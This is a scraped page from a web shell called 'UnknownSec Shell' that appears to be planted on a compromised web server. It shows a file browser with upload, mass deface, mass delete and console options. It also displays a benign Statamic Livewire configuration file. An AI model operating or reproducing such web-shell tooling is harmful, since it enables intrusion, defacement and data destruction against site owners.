shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
jonassiewertsen
/
statamic-livewire
/
config
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
config.php
<?php return [ /* |-------------------------------------------------------------------------- | EXPERIMENTAL: Livewire Synthesizers |-------------------------------------------------------------------------- | | So called synthesizers allow to add custom types to Livewire, which can | can be used to make Livewire aware of Statamic classes that you want | to work with, as it might make things easier. | | It's recommended to remove or uncomment those synthesizers that are | not used in your application, to avoid overhead by loading those. | | This features is experimental. It's ment to be tested and to played | with. As long as it is experimental, it can be changed and removed | at any point without a warning. | */ 'synthesizers' => [ 'enabled' => false, 'classes' => [ \Jonassiewertsen\Livewire\Synthesizers\EntryCollectionSynthesizer::class, \Jonassiewertsen\Livewire\Synthesizers\EntrySynthesizer::class, \Jonassiewertsen\Livewire\Synthesizers\FieldSynthesizer::class, \Jonassiewertsen\Livewire\Synthesizers\FieldtypeSynthesizer::class, \Jonassiewertsen\Livewire\Synthesizers\ValueSynthesizer::class, ], ], /* |-------------------------------------------------------------------------- | Replacers |-------------------------------------------------------------------------- | | Define the replacers that will be used when static caching is enabled | to dynamically replace content within the response. | */ 'replacers' => [ \Jonassiewertsen\Livewire\Replacers\AssetsReplacer::class, ], ];
© 2026 UnknownSec